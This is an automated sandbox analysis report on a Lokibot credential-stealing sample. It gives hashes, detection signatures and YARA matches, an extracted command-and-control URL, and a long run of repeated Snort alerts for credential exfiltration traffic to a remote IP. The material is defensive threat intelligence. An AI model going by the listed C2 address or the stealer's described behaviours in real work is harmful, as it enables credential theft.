Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770 (renamed file extension from 20770 to exe)
Analysis ID:325825
MD5:2aaa15e28835feda9a2e223d82db2126
SHA1:2c4ace288456010a2717597b192827cd9f7ec771
SHA256:e385b8f5946a41469f49fad4aaeb98e510e79afd0ba6c8546c7b6548da61b8e6
Tags:Loki

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Yara detected Lokibot
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"c2:": "http://nevomw.com/candy/five/fre.php"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.480912778.0000000000E84000.00000004.00000001.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000001.00000002.607799523.0000000000E68000.00000004.00000020.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        00000001.00000003.476321253.0000000000E84000.00000004.00000001.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          00000001.00000003.452594690.0000000000E7C000.00000004.00000001.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
            00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 53 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                  1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                    1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackLoki_1Loki Payloadkevoreilly
                    • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                    • 0x153fc:$a2: last_compatible_version
                    1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                    • 0x13bff:$des3: 68 03 66 00 00
                    • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                    • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                    Click to see the 5 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.4852.1.memstrMalware Configuration Extractor: Lokibot {"c2:": "http://nevomw.com/candy/five/fre.php"}
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: nevomw.comVirustotal: Detection: 10%Perma Link
                    Source: http://nevomw.com/candy/five/fre.phpVirustotal: Detection: 12%Perma Link
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeVirustotal: Detection: 39%Perma Link
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeReversingLabs: Detection: 20%
                    Machine Learning detection for sampleShow sources
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 4x nop then jmp 07AC5FADh0_2_07AC5F28
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 4x nop then jmp 07AC5FADh0_2_07AC5F38

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49712 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49712 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49712 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49712 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49713 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49713 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49713 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49713 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49714 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49714 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49714 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49714 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49714
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49715 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49715 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49715 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49715 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49715
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49716 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49716 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49716 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49716 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49716
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49717 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49717 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49717 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49717 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49717
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49718 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49718 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49718 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49718 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49718
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49720 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49720 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49720 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49720 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49720
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49721 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49721 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49721 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49721 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49721
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49722 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49722 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49722 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49722 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49722
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49723 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49723 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49723 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49723 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49723
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49724 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49724 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49724 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49724 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49724
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49725 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49725 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49725 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49725 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49725
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49726 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49726 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49726 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49726 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49726
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49727 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49727 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49727 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49727 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49727
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49728 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49728 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49728 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49728 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49728
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49729 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49729 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49729 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49729 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49729
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49730 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49730 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49730 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49730 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49730
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49731 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49731 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49731 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49731 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49731
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49732 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49732 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49732 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49732 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49732
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49733 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49733 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49733 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49733 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49733
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49734 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49734 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49734 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49734 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49734
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49735 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49735 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49735 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49735 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49735
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49737 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49737 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49737 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49737 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49737
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49740 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49740 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49740 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49740 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49740
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49741 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49741 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49741 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49741 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49741
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49742 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49742 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49742 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49742 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49742
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49743 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49743 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49743 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49743 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49743
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49744 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49744 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49744 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49744 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49744
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49745 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49745 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49745 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49745 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49745
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49746 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49746 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49746 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49746 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49746
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49747 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49747 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49747 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49747 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49747
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49748 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49748 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49748 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49748 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49748
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49749 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49749 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49749 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49749 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49749
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49750 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49750 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49750 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49750 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49750
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49751 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49751 -> 45.144.3.234:80
